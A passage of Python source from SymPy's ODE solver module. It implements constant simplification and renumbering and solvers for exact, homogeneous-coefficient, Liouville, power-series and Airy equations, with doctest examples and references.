func += list(d.atoms(AppliedUndef))
for func_ in func:
funcs.append(func_)
funcs = list(uniq(funcs))
return funcs
def _get_constant_subexpressions(expr, Cs):
Cs = set(Cs)
Ces = []
def _recursive_walk(expr):
expr_syms = expr.free_symbols
if expr_syms and expr_syms.issubset(Cs):
Ces.append(expr)
else:
if expr.func == exp:
expr = expr.expand(mul=True)
if expr.func in (Add, Mul):
d = sift(expr.args, lambda i : i.free_symbols.issubset(Cs))
if len(d[True]) > 1:
x = expr.func(*d[True])
if not x.is_number:
Ces.append(x)
elif isinstance(expr, Integral):
if expr.free_symbols.issubset(Cs) and \
all(len(x) == 3 for x in expr.limits):
Ces.append(expr)
for i in expr.args:
_recursive_walk(i)
return
_recursive_walk(expr)
return Ces
def __remove_linear_redundancies(expr, Cs):
cnts = {i: expr.count(i) for i in Cs}
Cs = [i for i in Cs if cnts[i] > 0]
def _linear(expr):
if isinstance(expr, Add):
xs = [i for i in Cs if expr.count(i)==cnts[i] \
and 0 == expr.diff(i, 2)]
d = {}
for x in xs:
y = expr.diff(x)
if y not in d:
d[y]=[]
d[y].append(x)
for y in d:
if len(d[y]) > 1:
d[y].sort(key=str)
for x in d[y][1:]:
expr = expr.subs(x, 0)
return expr
def _recursive_walk(expr):
if len(expr.args) != 0:
expr = expr.func(*[_recursive_walk(i) for i in expr.args])
expr = _linear(expr)
return expr
if isinstance(expr, Equality):
lhs, rhs = [_recursive_walk(i) for i in expr.args]
f = lambda i: isinstance(i, Number) or i in Cs
if isinstance(lhs, Symbol) and lhs in Cs:
rhs, lhs = lhs, rhs
if lhs.func in (Add, Symbol) and rhs.func in (Add, Symbol):
dlhs = sift([lhs] if isinstance(lhs, AtomicExpr) else lhs.args, f)
drhs = sift([rhs] if isinstance(rhs, AtomicExpr) else rhs.args, f)
for i in [True, False]:
for hs in [dlhs, drhs]:
if i not in hs:
hs[i] = [0]
# this calculation can be simplified
lhs = Add(*dlhs[False]) - Add(*drhs[False])
rhs = Add(*drhs[True]) - Add(*dlhs[True])
elif lhs.func in (Mul, Symbol) and rhs.func in (Mul, Symbol):
dlhs = sift([lhs] if isinstance(lhs, AtomicExpr) else lhs.args, f)
if True in dlhs:
if False not in dlhs:
dlhs[False] = [1]
lhs = Mul(*dlhs[False])
rhs = rhs/Mul(*dlhs[True])
return Eq(lhs, rhs)
else:
return _recursive_walk(expr)
@vectorize(0)
def constantsimp(expr, constants):
r"""
Simplifies an expression with arbitrary constants in it.
This function is written specifically to work with
:py:meth:`~sympy.solvers.ode.dsolve`, and is not intended for general use.
Simplification is done by "absorbing" the arbitrary constants into other
arbitrary constants, numbers, and symbols that they are not independent
of.
The symbols must all have the same name with numbers after it, for
example, ``C1``, ``C2``, ``C3``. The ``symbolname`` here would be
'``C``', the ``startnumber`` would be 1, and the ``endnumber`` would be 3.
If the arbitrary constants are independent of the variable ``x``, then the
independent symbol would be ``x``. There is no need to specify the
dependent function, such as ``f(x)``, because it already has the
independent symbol, ``x``, in it.
Because terms are "absorbed" into arbitrary constants and because
constants are renumbered after simplifying, the arbitrary constants in
expr are not necessarily equal to the ones of the same name in the
returned result.
If two or more arbitrary constants are added, multiplied, or raised to the
power of each other, they are first absorbed together into a single
arbitrary constant. Then the new constant is combined into other terms if
necessary.
Absorption of constants is done with limited assistance:
1. terms of :py:class:`~sympy.core.add.Add`\s are collected to try join
constants so `e^x (C_1 \cos(x) + C_2 \cos(x))` will simplify to `e^x
C_1 \cos(x)`;
2. powers with exponents that are :py:class:`~sympy.core.add.Add`\s are
expanded so `e^{C_1 + x}` will be simplified to `C_1 e^x`.
Use :py:meth:`~sympy.solvers.ode.ode.constant_renumber` to renumber constants
after simplification or else arbitrary numbers on constants may appear,
e.g. `C_1 + C_3 x`.
In rare cases, a single constant can be "simplified" into two constants.
Every differential equation solution should have as many arbitrary
constants as the order of the differential equation. The result here will
be technically correct, but it may, for example, have `C_1` and `C_2` in
an expression, when `C_1` is actually equal to `C_2`. Use your discretion
in such situations, and also take advantage of the ability to use hints in
:py:meth:`~sympy.solvers.ode.dsolve`.
Examples
========
>>> from sympy import symbols
>>> from sympy.solvers.ode.ode import constantsimp
>>> C1, C2, C3, x, y = symbols('C1, C2, C3, x, y')
>>> constantsimp(2*C1*x, {C1, C2, C3})
C1*x
>>> constantsimp(C1 + 2 + x, {C1, C2, C3})
C1 + x
>>> constantsimp(C1*C2 + 2 + C2 + C3*x, {C1, C2, C3})
C1 + C3*x
"""
# This function works recursively. The idea is that, for Mul,
# Add, Pow, and Function, if the class has a constant in it, then
# we can simplify it, which we do by recursing down and
# simplifying up. Otherwise, we can skip that part of the
# expression.
Cs = constants
orig_expr = expr
constant_subexprs = _get_constant_subexpressions(expr, Cs)
for xe in constant_subexprs:
xes = list(xe.free_symbols)
if not xes:
continue
if all([expr.count(c) == xe.count(c) for c in xes]):
xes.sort(key=str)
expr = expr.subs(xe, xes[0])
# try to perform common sub-expression elimination of constant terms
try:
commons, rexpr = cse(expr)
commons.reverse()
rexpr = rexpr[0]
for s in commons:
cs = list(s[1].atoms(Symbol))
if len(cs) == 1 and cs[0] in Cs and \
cs[0] not in rexpr.atoms(Symbol) and \
not any(cs[0] in ex for ex in commons if ex != s):
rexpr = rexpr.subs(s[0], cs[0])
else:
rexpr = rexpr.subs(*s)
expr = rexpr
except IndexError:
pass
expr = __remove_linear_redundancies(expr, Cs)
def _conditional_term_factoring(expr):
new_expr = terms_gcd(expr, clear=False, deep=True, expand=False)
# we do not want to factor exponentials, so handle this separately
if new_expr.is_Mul:
infac = False
asfac = False
for m in new_expr.args:
if isinstance(m, exp):
asfac = True
elif m.is_Add:
infac = any(isinstance(fi, exp) for t in m.args
for fi in Mul.make_args(t))
if asfac and infac:
new_expr = expr
break
return new_expr
expr = _conditional_term_factoring(expr)
# call recursively if more simplification is possible
if orig_expr != expr:
return constantsimp(expr, Cs)
return expr
def constant_renumber(expr, variables=None, newconstants=None):
r"""
Renumber arbitrary constants in ``expr`` to use the symbol names as given
in ``newconstants``. In the process, this reorders expression terms in a
standard way.
If ``newconstants`` is not provided then the new constant names will be
``C1``, ``C2`` etc. Otherwise ``newconstants`` should be an iterable
giving the new symbols to use for the constants in order.
The ``variables`` argument is a list of non-constant symbols. All other
free symbols found in ``expr`` are assumed to be constants and will be
renumbered. If ``variables`` is not given then any numbered symbol
beginning with ``C`` (e.g. ``C1``) is assumed to be a constant.
Symbols are renumbered based on ``.sort_key()``, so they should be
numbered roughly in the order that they appear in the final, printed
expression. Note that this ordering is based in part on hashes, so it can
produce different results on different machines.
The structure of this function is very similar to that of
:py:meth:`~sympy.solvers.ode.constantsimp`.
Examples
========
>>> from sympy import symbols
>>> from sympy.solvers.ode.ode import constant_renumber
>>> x, C1, C2, C3 = symbols('x,C1:4')
>>> expr = C3 + C2*x + C1*x**2
>>> expr
C1*x**2 + C2*x + C3
>>> constant_renumber(expr)
C1 + C2*x + C3*x**2
The ``variables`` argument specifies which are constants so that the
other symbols will not be renumbered:
>>> constant_renumber(expr, [C1, x])
C1*x**2 + C2 + C3*x
The ``newconstants`` argument is used to specify what symbols to use when
replacing the constants:
>>> constant_renumber(expr, [x], newconstants=symbols('E1:4'))
E1 + E2*x + E3*x**2
"""
# System of expressions
if isinstance(expr, (set, list, tuple)):
return type(expr)(constant_renumber(Tuple(*expr),
variables=variables, newconstants=newconstants))
# Symbols in solution but not ODE are constants
if variables is not None:
variables = set(variables)
free_symbols = expr.free_symbols
constantsymbols = list(free_symbols - variables)
# Any Cn is a constant...
else:
variables = set()
isconstant = lambda s: s.startswith('C') and s[1:].isdigit()
constantsymbols = [sym for sym in expr.free_symbols if isconstant(sym.name)]
# Find new constants checking that they aren't already in the ODE
if newconstants is None:
iter_constants = numbered_symbols(start=1, prefix='C', exclude=variables)
else:
iter_constants = (sym for sym in newconstants if sym not in variables)
constants_found = []
# make a mapping to send all constantsymbols to S.One and use
# that to make sure that term ordering is not dependent on
# the indexed value of C
C_1 = [(ci, S.One) for ci in constantsymbols]
sort_key=lambda arg: default_sort_key(arg.subs(C_1))
def _constant_renumber(expr):
r"""
We need to have an internal recursive function
"""
# For system of expressions
if isinstance(expr, Tuple):
renumbered = [_constant_renumber(e) for e in expr]
return Tuple(*renumbered)
if isinstance(expr, Equality):
return Eq(
_constant_renumber(expr.lhs),
_constant_renumber(expr.rhs))
if type(expr) not in (Mul, Add, Pow) and not expr.is_Function and \
not expr.has(*constantsymbols):
# Base case, as above. Hope there aren't constants inside
# of some other class, because they won't be renumbered.
return expr
elif expr.is_Piecewise:
return expr
elif expr in constantsymbols:
if expr not in constants_found:
constants_found.append(expr)
return expr
elif expr.is_Function or expr.is_Pow:
return expr.func(
*[_constant_renumber(x) for x in expr.args])
else:
sortedargs = list(expr.args)
sortedargs.sort(key=sort_key)
return expr.func(*[_constant_renumber(x) for x in sortedargs])
expr = _constant_renumber(expr)
# Don't renumber symbols present in the ODE.
constants_found = [c for c in constants_found if c not in variables]
# Renumbering happens here
subs_dict = {var: cons for var, cons in zip(constants_found, iter_constants)}
expr = expr.subs(subs_dict, simultaneous=True)
return expr
def _handle_Integral(expr, func, hint):
r"""
Converts a solution with Integrals in it into an actual solution.
For most hints, this simply runs ``expr.doit()``.
"""
# XXX: This global y hack should be removed
global y
x = func.args[0]
f = func.func
if hint == "1st_exact":
sol = (expr.doit()).subs(y, f(x))
del y
elif hint == "1st_exact_Integral":
sol = Eq(Subs(expr.lhs, y, f(x)), expr.rhs)
del y
elif hint == "nth_linear_constant_coeff_homogeneous":
sol = expr
elif not hint.endswith("_Integral"):
sol = expr.doit()
else:
sol = expr
return sol
# FIXME: replace the general solution in the docstring with
# dsolve(equation, hint='1st_exact_Integral'). You will need to be able
# to have assumptions on P and Q that dP/dy = dQ/dx.
def ode_1st_exact(eq, func, order, match):
r"""
Solves 1st order exact ordinary differential equations.
A 1st order differential equation is called exact if it is the total
differential of a function. That is, the differential equation
.. math:: P(x, y) \,\partial{}x + Q(x, y) \,\partial{}y = 0
is exact if there is some function `F(x, y)` such that `P(x, y) =
\partial{}F/\partial{}x` and `Q(x, y) = \partial{}F/\partial{}y`. It can
be shown that a necessary and sufficient condition for a first order ODE
to be exact is that `\partial{}P/\partial{}y = \partial{}Q/\partial{}x`.
Then, the solution will be as given below::
>>> from sympy import Function, Eq, Integral, symbols, pprint
>>> x, y, t, x0, y0, C1 = symbols('x,y,t,x0,y0,C1')
>>> P, Q, F = map(Function, ['P', 'Q', 'F'])
>>> pprint(Eq(Eq(F(x, y), Integral(P(t, y), (t, x0, x)) +
... Integral(Q(x0, t), (t, y0, y))), C1))
x y
/ /
| |
F(x, y) = | P(t, y) dt + | Q(x0, t) dt = C1
| |
/ /
x0 y0
Where the first partials of `P` and `Q` exist and are continuous in a
simply connected region.
A note: SymPy currently has no way to represent inert substitution on an
expression, so the hint ``1st_exact_Integral`` will return an integral
with `dy`. This is supposed to represent the function that you are
solving for.
Examples
========
>>> from sympy import Function, dsolve, cos, sin
>>> from sympy.abc import x
>>> f = Function('f')
>>> dsolve(cos(f(x)) - (x*sin(f(x)) - f(x)**2)*f(x).diff(x),
... f(x), hint='1st_exact')
Eq(x*cos(f(x)) + f(x)**3/3, C1)
References
==========
- https://en.wikipedia.org/wiki/Exact_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 73
# indirect doctest
"""
x = func.args[0]
r = match # d+e*diff(f(x),x)
e = r[r['e']]
d = r[r['d']]
# XXX: This global y hack should be removed
global y # This is the only way to pass dummy y to _handle_Integral
y = r['y']
C1 = get_numbered_constants(eq, num=1)
# Refer to Joel Moses, "Symbolic Integration - The Stormy Decade",
# Communications of the ACM, Volume 14, Number 8, August 1971, pp. 558
# which gives the method to solve an exact differential equation.
sol = Integral(d, x) + Integral((e - (Integral(d, x).diff(y))), y)
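# i.e. F(x, y) = Integral(P, x) + Integral(Q - d/dy(Integral(P, x)), y),
# the usual construction of the potential function F for an exact ODE.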
return Eq(sol, C1)
def ode_1st_homogeneous_coeff_best(eq, func, order, match):
r"""
Returns the best solution to an ODE from the two hints
``1st_homogeneous_coeff_subs_dep_div_indep`` and
``1st_homogeneous_coeff_subs_indep_div_dep``.
This is as determined by :py:meth:`~sympy.solvers.ode.ode.ode_sol_simplicity`.
See the
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`
and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep`
docstrings for more information on these hints. Note that there is no
``ode_1st_homogeneous_coeff_best_Integral`` hint.
Examples
========
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(2*x*f(x) + (x**2 + f(x)**2)*f(x).diff(x), f(x),
... hint='1st_homogeneous_coeff_best', simplify=False))
/ 2 \
| 3*x |
log|----- + 1|
| 2 |
\f (x) /
log(f(x)) = log(C1) - --------------
3
References
==========
- https://en.wikipedia.org/wiki/Homogeneous_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 59
# indirect doctest
"""
# There are two substitutions that solve the equation, u1=y/x and u2=x/y
# They produce different integrals, so try them both and see which
# one is easier.
sol1 = ode_1st_homogeneous_coeff_subs_indep_div_dep(eq,
func, order, match)
sol2 = ode_1st_homogeneous_coeff_subs_dep_div_indep(eq,
func, order, match)
simplify = match.get('simplify', True)
if simplify:
# why is odesimp called here? Should it be at the usual spot?
sol1 = odesimp(eq, sol1, func, "1st_homogeneous_coeff_subs_indep_div_dep")
sol2 = odesimp(eq, sol2, func, "1st_homogeneous_coeff_subs_dep_div_indep")
return min([sol1, sol2], key=lambda x: ode_sol_simplicity(x, func,
trysolving=not simplify))
def ode_1st_homogeneous_coeff_subs_dep_div_indep(eq, func, order, match):
r"""
Solves a 1st order differential equation with homogeneous coefficients
using the substitution `u_1 = \frac{\text{<dependent
variable>}}{\text{<independent variable>}}`.
This is a differential equation
.. math:: P(x, y) + Q(x, y) dy/dx = 0
such that `P` and `Q` are homogeneous and of the same order. A function
`F(x, y)` is homogeneous of order `n` if `F(x t, y t) = t^n F(x, y)`.
Equivalently, `F(x, y)` can be rewritten as `G(y/x)` or `H(x/y)`. See
also the docstring of :py:meth:`~sympy.solvers.ode.homogeneous_order`.
If the coefficients `P` and `Q` in the differential equation above are
homogeneous functions of the same order, then it can be shown that the
substitution `y = u_1 x` (i.e. `u_1 = y/x`) will turn the differential
equation into an equation separable in the variables `x` and `u_1`. If
`g(u_1)` is the function that results from making the substitution `u_1 =
f(x)/x` on `P(x, f(x))` and `h(u_1)` is the function that results from the
substitution on `Q(x, f(x))` in the differential equation `P(x, f(x)) +
Q(x, f(x)) f'(x) = 0`, then the general solution is::
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f, g, h = map(Function, ['f', 'g', 'h'])
>>> genform = g(f(x)/x) + h(f(x)/x)*f(x).diff(x)
>>> pprint(genform)
/f(x)\ /f(x)\ d
g|----| + h|----|*--(f(x))
\ x / \ x / dx
>>> pprint(dsolve(genform, f(x),
... hint='1st_homogeneous_coeff_subs_dep_div_indep_Integral'))
f(x)
----
x
/
|
| -h(u1)
log(x) = C1 + | ---------------- d(u1)
| u1*h(u1) + g(u1)
|
/
Where `u_1 h(u_1) + g(u_1) \ne 0` and `x \ne 0`.
See also the docstrings of
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best` and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`.
Examples
========
>>> from sympy import Function, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(2*x*f(x) + (x**2 + f(x)**2)*f(x).diff(x), f(x),
... hint='1st_homogeneous_coeff_subs_dep_div_indep', simplify=False))
/ 3 \
|3*f(x) f (x)|
log|------ + -----|
| x 3 |
\ x /
log(x) = log(C1) - -------------------
3
References
==========
- https://en.wikipedia.org/wiki/Homogeneous_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 59
# indirect doctest
"""
x = func.args[0]
f = func.func
u = Dummy('u')
u1 = Dummy('u1') # u1 == f(x)/x
r = match # d+e*diff(f(x),x)
C1 = get_numbered_constants(eq, num=1)
xarg = match.get('xarg', 0)
yarg = match.get('yarg', 0)
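# The integrand below is -h(u1)/(u1*h(u1) + g(u1)) from the docstring,
# obtained by substituting x -> 1 and y -> u1 in the matched d and e.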
int = Integral(
(-r[r['e']]/(r[r['d']] + u1*r[r['e']])).subs({x: 1, r['y']: u1}),
(u1, None, f(x)/x))
sol = logcombine(Eq(log(x), int + log(C1)), force=True)
sol = sol.subs(f(x), u).subs(((u, u - yarg), (x, x - xarg), (u, f(x))))
return sol
def ode_1st_homogeneous_coeff_subs_indep_div_dep(eq, func, order, match):
r"""
Solves a 1st order differential equation with homogeneous coefficients
using the substitution `u_2 = \frac{\text{<independent
variable>}}{\text{<dependent variable>}}`.
This is a differential equation
.. math:: P(x, y) + Q(x, y) dy/dx = 0
such that `P` and `Q` are homogeneous and of the same order. A function
`F(x, y)` is homogeneous of order `n` if `F(x t, y t) = t^n F(x, y)`.
Equivalently, `F(x, y)` can be rewritten as `G(y/x)` or `H(x/y)`. See
also the docstring of :py:meth:`~sympy.solvers.ode.homogeneous_order`.
If the coefficients `P` and `Q` in the differential equation above are
homogeneous functions of the same order, then it can be shown that the
substitution `x = u_2 y` (i.e. `u_2 = x/y`) will turn the differential
equation into an equation separable in the variables `y` and `u_2`. If
`g(u_2)` is the function that results from making the substitution `u_2 =
x/f(x)` on `P(x, f(x))` and `h(u_2)` is the function that results from the
substitution on `Q(x, f(x))` in the differential equation `P(x, f(x)) +
Q(x, f(x)) f'(x) = 0`, then the general solution is:
>>> from sympy import Function, dsolve, pprint
>>> from sympy.abc import x
>>> f, g, h = map(Function, ['f', 'g', 'h'])
>>> genform = g(x/f(x)) + h(x/f(x))*f(x).diff(x)
>>> pprint(genform)
/ x \ / x \ d
g|----| + h|----|*--(f(x))
\f(x)/ \f(x)/ dx
>>> pprint(dsolve(genform, f(x),
... hint='1st_homogeneous_coeff_subs_indep_div_dep_Integral'))
x
----
f(x)
/
|
| -g(u2)
| ---------------- d(u2)
| u2*g(u2) + h(u2)
|
/
<BLANKLINE>
f(x) = C1*e
Where `u_2 g(u_2) + h(u_2) \ne 0` and `f(x) \ne 0`.
See also the docstrings of
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_best` and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep`.
Examples
========
>>> from sympy import Function, pprint, dsolve
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(2*x*f(x) + (x**2 + f(x)**2)*f(x).diff(x), f(x),
... hint='1st_homogeneous_coeff_subs_indep_div_dep',
... simplify=False))
/ 2 \
| 3*x |
log|----- + 1|
| 2 |
\f (x) /
log(f(x)) = log(C1) - --------------
3
References
==========
- https://en.wikipedia.org/wiki/Homogeneous_differential_equation
- M. Tenenbaum & H. Pollard, "Ordinary Differential Equations",
Dover 1963, pp. 59
# indirect doctest
"""
x = func.args[0]
f = func.func
u = Dummy('u')
u2 = Dummy('u2') # u2 == x/f(x)
r = match # d+e*diff(f(x),x)
C1 = get_numbered_constants(eq, num=1)
xarg = match.get('xarg', 0) # If xarg present take xarg, else zero
yarg = match.get('yarg', 0) # If yarg present take yarg, else zero
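# The integrand below is -g(u2)/(u2*g(u2) + h(u2)) from the docstring,
# obtained by substituting x -> u2 and y -> 1 in the matched d and e.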
int = Integral(
simplify(
(-r[r['d']]/(r[r['e']] + u2*r[r['d']])).subs({x: u2, r['y']: 1})),
(u2, None, x/f(x)))
sol = logcombine(Eq(log(f(x)), int + log(C1)), force=True)
sol = sol.subs(f(x), u).subs(((u, u - yarg), (x, x - xarg), (u, f(x))))
return sol
# XXX: Should this function maybe go somewhere else?
def homogeneous_order(eq, *symbols):
r"""
Returns the order `n` if `g` is homogeneous and ``None`` if it is not
homogeneous.
Determines if a function is homogeneous and if so of what order. A
function `f(x, y, \cdots)` is homogeneous of order `n` if `f(t x, t y,
\cdots) = t^n f(x, y, \cdots)`.
If the function is of two variables, `F(x, y)`, then `f` being homogeneous
of any order is equivalent to being able to rewrite `F(x, y)` as `G(x/y)`
or `H(y/x)`. This fact is used to solve 1st order ordinary differential
equations whose coefficients are homogeneous of the same order (see the
docstrings of
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_dep_div_indep` and
:py:meth:`~sympy.solvers.ode.ode.ode_1st_homogeneous_coeff_subs_indep_div_dep`).
Symbols can be functions, but every argument of the function must be a
symbol, and the arguments of the function that appear in the expression
must match those given in the list of symbols. If a declared function
appears with different arguments than given in the list of symbols,
``None`` is returned.
Examples
========
>>> from sympy import Function, homogeneous_order, sqrt
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> homogeneous_order(f(x), f(x)) is None
True
>>> homogeneous_order(f(x,y), f(y, x), x, y) is None
True
>>> homogeneous_order(f(x), f(x), x)
1
>>> homogeneous_order(x**2*f(x)/sqrt(x**2+f(x)**2), x, f(x))
2
>>> homogeneous_order(x**2+f(x), x, f(x)) is None
True
"""
if not symbols:
raise ValueError("homogeneous_order: no symbols were given.")
symset = set(symbols)
eq = sympify(eq)
# The following are not supported
if eq.has(Order, Derivative):
return None
# These are all constants
if (eq.is_Number or
eq.is_NumberSymbol or
eq.is_number
):
return S.Zero
# Replace all functions with dummy variables
dum = numbered_symbols(prefix='d', cls=Dummy)
newsyms = set()
for i in [j for j in symset if getattr(j, 'is_Function')]:
iargs = set(i.args)
if iargs.difference(symset):
return None
else:
dummyvar = next(dum)
eq = eq.subs(i, dummyvar)
symset.remove(i)
newsyms.add(dummyvar)
symset.update(newsyms)
if not eq.free_symbols & symset:
return None
# assuming order of a nested function can only be equal to zero
if isinstance(eq, Function):
return None if homogeneous_order(
eq.args[0], *tuple(symset)) != 0 else S.Zero
# make the replacement of x with x*t and see if t can be factored out
t = Dummy('t', positive=True) # It is sufficient that t > 0
eqs = separatevars(eq.subs([(i, t*i) for i in symset]), [t], dict=True)[t]
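# Illustrative example: for x**2 + f(x)**2 (with f(x) replaced by a dummy
# above) the substitution yields t**2 times the original expression, so
# separatevars pulls out t**2 and the order 2 is returned below.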
if eqs is S.One:
return S.Zero # there was no term with only t
i, d = eqs.as_independent(t, as_Add=False)
b, e = d.as_base_exp()
if b == t:
return e
def ode_Liouville(eq, func, order, match):
r"""
Solves 2nd order Liouville differential equations.
The general form of a Liouville ODE is
.. math:: \frac{d^2 y}{dx^2} + g(y) \left(\!
\frac{dy}{dx}\!\right)^2 + h(x)
\frac{dy}{dx}\text{.}
The general solution is:
>>> from sympy import Function, dsolve, Eq, pprint, diff
>>> from sympy.abc import x
>>> f, g, h = map(Function, ['f', 'g', 'h'])
>>> genform = Eq(diff(f(x),x,x) + g(f(x))*diff(f(x),x)**2 +
... h(x)*diff(f(x),x), 0)
>>> pprint(genform)
2 2
/d \ d d
g(f(x))*|--(f(x))| + h(x)*--(f(x)) + ---(f(x)) = 0
\dx / dx 2
dx
>>> pprint(dsolve(genform, f(x), hint='Liouville_Integral'))
f(x)
/ /
| |
| / | /
| | | |
| - | h(x) dx | | g(y) dy
| | | |
| / | /
C1 + C2* | e dx + | e dy = 0
| |
/ /
Examples
========
>>> from sympy import Function, dsolve, Eq, pprint
>>> from sympy.abc import x
>>> f = Function('f')
>>> pprint(dsolve(diff(f(x), x, x) + diff(f(x), x)**2/f(x) +
... diff(f(x), x)/x, f(x), hint='Liouville'))
________________ ________________
[f(x) = -\/ C1 + C2*log(x) , f(x) = \/ C1 + C2*log(x) ]
References
==========
- Goldstein and Braun, "Advanced Methods for the Solution of Differential
Equations", pp. 98
- http://www.maplesoft.com/support/help/Maple/view.aspx?path=odeadvisor/Liouville
# indirect doctest
"""
# Liouville ODE:
# f(x).diff(x, 2) + g(f(x))*(f(x).diff(x, 2))**2 + h(x)*f(x).diff(x)
# See Goldstein and Braun, "Advanced Methods for the Solution of
# Differential Equations", pg. 98, as well as
# http://www.maplesoft.com/support/help/view.aspx?path=odeadvisor/Liouville
x = func.args[0]
f = func.func
r = match # f(x).diff(x, 2) + g*f(x).diff(x)**2 + h*f(x).diff(x)
y = r['y']
C1, C2 = get_numbered_constants(eq, num=2)
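# Quadrature from the docstring (with the roles of C1 and C2 swapped):
# Integral(exp(Integral(g, y)), y) + C1*Integral(exp(-Integral(h, x)), x) + C2 = 0.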
int = Integral(exp(Integral(r['g'], y)), (y, None, f(x)))
sol = Eq(int + C1*Integral(exp(-Integral(r['h'], x)), x) + C2, 0)
return sol
def ode_2nd_power_series_ordinary(eq, func, order, match):
r"""
Gives a power series solution to a second order homogeneous differential
equation with polynomial coefficients at an ordinary point. A homogeneous
differential equation is of the form
.. math :: P(x)\frac{d^2y}{dx^2} + Q(x)\frac{dy}{dx} + R(x) y = 0
For simplicity it is assumed that `P(x)`, `Q(x)` and `R(x)` are polynomials;
it is sufficient that `\frac{Q(x)}{P(x)}` and `\frac{R(x)}{P(x)}` exist at
`x_{0}`. A recurrence relation is obtained by substituting `y = \sum_{n=0}^\infty a_{n}x^{n}`
into the differential equation and equating coefficients of each power of `x`.
Using this relation various terms can be generated.
Examples
========
>>> from sympy import dsolve, Function, pprint
>>> from sympy.abc import x
>>> f = Function("f")
>>> eq = f(x).diff(x, 2) + f(x)
>>> pprint(dsolve(eq, hint='2nd_power_series_ordinary'))
/ 4 2 \ / 2\
|x x | | x | / 6\
f(x) = C2*|-- - -- + 1| + C1*x*|1 - --| + O\x /
\24 2 / \ 6 /
References
==========
- http://tutorial.math.lamar.edu/Classes/DE/SeriesSolutions.aspx
- George F. Simmons, "Differential Equations with Applications and
Historical Notes", pp. 176 - 184
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
n = Dummy("n", integer=True)
s = Wild("s")
k = Wild("k", exclude=[x])
x0 = match.get('x0')
terms = match.get('terms', 5)
p = match[match['a3']]
q = match[match['b3']]
r = match[match['c3']]
seriesdict = {}
recurr = Function("r")
# Generating the recurrence relation which works this way:
# for the second order term the summation begins at n = 2. The coefficient
# p is multiplied by a_n*n*(n - 1)*x**(n - 2) and a substitution is made so
# that the exponent of x becomes n.
# For example, if p is x, then the second order term contributes
# a_n*n*(n - 1)*x**(n - 1); substituting n -> n + 1, it transforms to
# a_(n+1)*(n + 1)*n*x**n.
# A similar process is done with the first order and zeroth order term.
coefflist = [(recurr(n), r), (n*recurr(n), q), (n*(n - 1)*recurr(n), p)]
for index, coeff in enumerate(coefflist):
if coeff[1]:
f2 = powsimp(expand((coeff[1]*(x - x0)**(n - index)).subs(x, x + x0)))
if f2.is_Add:
addargs = f2.args
else:
addargs = [f2]
for arg in addargs:
powm = arg.match(s*x**k)
term = coeff[0]*powm[s]
if not powm[k].is_Symbol:
term = term.subs(n, n - powm[k].as_independent(n)[0])
startind = powm[k].subs(n, index)
# See whether the starting index can be lowered further:
# if the term vanishes for n less than startind, the sum
# can equivalently start from that smaller n.
if startind:
for i in reversed(range(startind)):
if not term.subs(n, i):
seriesdict[term] = i
else:
seriesdict[term] = i + 1
break
else:
seriesdict[term] = S.Zero
    # Stripping off leading terms so that every summation starts at the same index.
teq = S.Zero
suminit = seriesdict.values()
rkeys = seriesdict.keys()
req = Add(*rkeys)
if any(suminit):
maxval = max(suminit)
for term in seriesdict:
val = seriesdict[term]
if val != maxval:
for i in range(val, maxval):
teq += term.subs(n, val)
finaldict = {}
if teq:
fargs = teq.atoms(AppliedUndef)
if len(fargs) == 1:
finaldict[fargs.pop()] = 0
else:
maxf = max(fargs, key = lambda x: x.args[0])
sol = solve(teq, maxf)
if isinstance(sol, list):
sol = sol[0]
finaldict[maxf] = sol
# Finding the recurrence relation in terms of the largest term.
fargs = req.atoms(AppliedUndef)
maxf = max(fargs, key = lambda x: x.args[0])
minf = min(fargs, key = lambda x: x.args[0])
if minf.args[0].is_Symbol:
startiter = 0
else:
startiter = -minf.args[0].as_independent(n)[0]
lhs = maxf
rhs = solve(req, maxf)
if isinstance(rhs, list):
rhs = rhs[0]
# Checking how many values are already present
tcounter = len([t for t in finaldict.values() if t])
for _ in range(tcounter, terms - 3): # Assuming c0 and c1 to be arbitrary
check = rhs.subs(n, startiter)
nlhs = lhs.subs(n, startiter)
nrhs = check.subs(finaldict)
finaldict[nlhs] = nrhs
startiter += 1
# Post processing
series = C0 + C1*(x - x0)
for term in finaldict:
if finaldict[term]:
fact = term.args[0]
series += (finaldict[term].subs([(recurr(0), C0), (recurr(1), C1)])*(
x - x0)**fact)
series = collect(expand_mul(series), [C0, C1]) + Order(x**terms)
return Eq(f(x), series)
def ode_2nd_linear_airy(eq, func, order, match):
r"""
Gives solution of the Airy differential equation
.. math :: \frac{d^2y}{dx^2} + (a + b x) y(x) = 0
in terms of Airy special functions airyai and airybi.
Examples
========
>>> from sympy import dsolve, Function
>>> from sympy.abc import x
>>> f = Function("f")
>>> eq = f(x).diff(x, 2) - x*f(x)
>>> dsolve(eq)
Eq(f(x), C1*airyai(x) + C2*airybi(x))
"""
x = func.args[0]
f = func.func
C0, C1 = get_numbered_constants(eq, num=2)
b = match['b']
m = match['m']
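    # Per the docstring form, the matched equation is f''(x) + (b + m*x)*f(x) = 0;
    # the substitution below maps it onto Airy's equation w''(t) - t*w(t) = 0.
    # For the docstring example f''(x) - x*f(x) = 0 we have b = 0, m = -1, so
    # arg simplifies to x and the result is C0*airyai(x) + C1*airybi(x).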
if m.is_positive:
arg = - b/cbrt(m)**2 - cbrt(m)*x
elif m.is_negative:
